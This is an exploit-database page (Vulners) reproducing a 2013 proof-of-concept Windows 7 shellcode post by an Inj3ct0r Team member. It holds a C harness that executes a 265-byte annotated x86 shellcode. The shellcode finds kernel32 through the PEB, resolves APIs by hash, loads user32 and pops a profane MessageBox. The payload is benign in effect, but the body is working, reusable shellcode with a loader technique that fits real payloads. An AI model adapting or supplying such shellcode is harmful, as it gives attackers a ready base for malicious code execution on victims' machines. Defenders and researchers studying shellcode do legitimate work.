Vulners
Lucene search
Windows7 Sub_Xor MessageBox Exec Shellcode - 265 Bytes
/*
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
###
# Title : Windows7 Sub_Xor MessageBox Exec Shellcode - (265 + Msg.&.Title) Bytes
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# TwiTter : @kedans
# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
# Platform/CatID : Shellcode - Local - Win32
# Type : Shellcode - proof of concept - Windows
# Tested on : Windows7
###
# <3 <3 Greetings t0 Palestine <3 <3
# F-ck HaCking, Lov3 Explo8ting !
proof / test img : http://oi47.tinypic.com/2cs6g3n.jpg
*/
#include <stdio.h>
#include <string.h>
// Windows7 Sub_Xor MessageBox Exec Shellcode - (265 + Msg.&.Title) Bytes
char msg[] =
"\xD9\xEB" // FLDPI
"\x9B" // WAIT
"\xD9\x74\x24\xF4" // FSTENV %ESP
// ----------
"\x31\xD2" // XOR %EDX,%EDX
"\xB2\x77" // MOV %DL, 0x77
"\x31\xC9" // XOR %ECX,%ECX
"\x64\x8B\x71\x30" // MOV %ESI,DWORD 0x30
"\x8B\x76\x0C" // MOV %ESI,DWORD %ESI
"\x8B\x76\x1C" // MOV %ESI,DWORD %ESI 0x1C
"\x8B\x46\x08" // MOV %EAX,DWORD %ESI 0x08
"\x8B\x7E\x20" // MOV %EDI,DWORD %ESI 0x20
"\x8B\x36" // MOV %ESI,DWORD %ESI
"\x38\x4F\x18" // CMP BYTE %EDI 0x18,%CL
"\x75\xF3" // JNZ SHORT .me
"\x59" // POP %ECX
"\x01\xD1" // ADD %ECX,%EDX
"\xFF\xE1" // JMP %ECX
"\x60" // PUSHAD
"\x8B\x6C\x24\x24" // MOV %EBP,DWORD %ESP 0x24
"\x8B\x45\x3C" // MOV %EAX,DWORD %EBP 0x3C
"\x8B\x54\x28\x78" // MOV %EDX,DWORD %EAX %EBP 0x78
"\x01\xEA" // ADD %EDX,%EBP
"\x8B\x4A\x18" // MOV %ECX,DWORD %EDX 0x18
"\x8B\x5A\x20" // MOV %EBX,DWORD %EDX 0x20
"\x01\xEB" // ADD %EBX,%EBP
"\xE3\x34" // JECXZ SHORT .me
"\x49" // DEC %ECX
"\x8B\x34\x8B" // MOV %ESI,DWORD %EBX %ECX
"\x01\xEE" // ADD %ESI,%EBP
"\x31\xFF" // XOR %EDI,%EDI
"\x31\xC0" // XOR %EAX,%EAX
"\xFC" // CLD
"\xAC" // LODS BYTE %ESI
"\x84\xC0" // TEST %AL,%AL
"\x74\x07" // JE SHORT .me
"\xC1\xCF\x0D" // ROR %EDI, 0x0D
"\x01\xC7" // ADD %EDI,%EAX
"\xEB\xF4" // JMP SHORT .me
"\x3B\x7C\x24\x28" // CMP %EDI,DWORD %ESP 0x28
"\x75\xE1" // JNZ SHORT .me
"\x8B\x5A\x24" // MOV %EBX,DWORD %EDX 0x24
"\x01\xEB" // ADD %EBX,%EBP
"\x66\x8B\x0C\x4B" // MOV %EBX %ECX
"\x8B\x5A\x1C" // MOV %EBX,DWORD %EDX 0x1C
"\x01\xEB" // ADD %EBX,%EBP
"\x8B\x04\x8B" // MOV %EAX,DWORD %EBX %ECX
"\x01\xE8" // ADD %EAX,%EBP
"\x89\x44\x24\x1C" // MOV DWORD %ESP 0x1C,%EAX
"\x61" // POPAD
"\xC3" // RETN
/* Free GAZzA! */
"\xB2\x08" // MOV %DL,0x08
"\x29\xD4" // SUB %ESP,%EDX
"\x89\xE5" // MOV %EBP,%ESP
"\x89\xC2" // MOV %EDX,%EAX
"\x68\x8E\x4E\x0E\xEC" // PUSH 0xEC0E4E8E
"\x52" // PUSH %EDX
"\xE8\x9F\xFF\xFF\xFF" // CALL .me
"\x89\x45\x04" // MOV DWORD %EBP 0x04,%EAX
"\xBB\x7E\xD8\xE2\x73" // MOV %EBX,0x73E2D87E
"\x87\x1C\x24" // XCHG DWORD %ESP,%EBX
"\x52" // PUSH %EDX
"\xE8\x8E\xFF\xFF\xFF" // CALL .me
"\x89\x45\x08" // MOV DWORD %EBP 0x08,%EAX
"\x68\x6C\x6C\x20\x41" // PUSH 0x41206C6C
"\x68\x33\x32\x2E\x64" // PUSH 0x642E3233
"\x68\x75\x73\x65\x72" // PUSH 0x72657375
"\x88\x5C\x24\x0A" // MOV BYTE %ESP 0x0A,%BL
"\x89\xE6" // MOV %ESI,%ESP
"\x56" // PUSH %ESI
"\xFF\x55\x04" // CALL DWORD %EBP 0x04
"\x89\xC2" // MOV %EDX,%EAX
"\x50" // PUSH %EAX
"\xBB\xA8\xA2\x4D\xBC" // MOV %EBX,0xBC4DA2A8
"\x87\x1C\x24" // XCHG DWORD %ESP,%EBX
"\x52" // PUSH %EDX
"\xE8\x61\xFF\xFF\xFF" // CALL .me
// ----------
/* Message Title */
"\x68\x49\x2E\x50\x58" // PUSH 0x58502E49
"\x68\x21\x20\x52\x2E" // PUSH 0x2E522021
"\x68\x20\x59\x6F\x75" // PUSH 0x756F5920
"\x68\x46\x75\x63\x6B" // PUSH 0x6B637546
// ----------
"\x31\xDB" // XOR %EBX,%EBX
"\x88\x5C\x24\x0F" // MOV BYTE %ESP 0x0F,%BL
"\x89\xE3" // MOV %EBX,%ESP
// ----------
/* Message Content */
"\x68\x2D\x44\x7A\x58" // PUSH 0x587A442D
"\x68\x64\x41\x6E\x73" // PUSH 0x736E4164
"\x68\x79\x20\x4B\x65" // PUSH 0x654B2079
"\x68\x65\x64\x20\x42" // PUSH 0x42206465
"\x68\x48\x61\x43\x6B" // PUSH 0x6B436148
// ----------
"\x31\xC9" // XOR %ECX,%ECX
"\x88" // MOV BYTE
"\x4C" // DEC %ESP
"\x24\x13" // AND %AL,0x13
"\x89\xE1" // MOV %ECX,%ESP
"\x31\xD2" // XOR %EDX,%EDX
"\x52" // PUSH %EDX
"\x53" // PUSH %EBX
"\x51" // PUSH %ECX
"\x52" // PUSH %EDX
"\xFF\xD0" // CALL %EAX
"\x31\xC0" // XOR %EAX,%EAX
"\x50" // PUSH %EAX
"\xFF\x55\x08"; // CALL DWORD %EBP 0x08
int main()
{
int (*dz)() = (int(*)())msg;
printf("bytes: %u\n", strlen(msg));
dz();
}
/*
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem
# Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
# Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * B.N.T * All Security and Exploits Webs
#============================================================================================================*/
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Mar 2013 00:00Current
0.1Low risk
Vulners AI Score0.1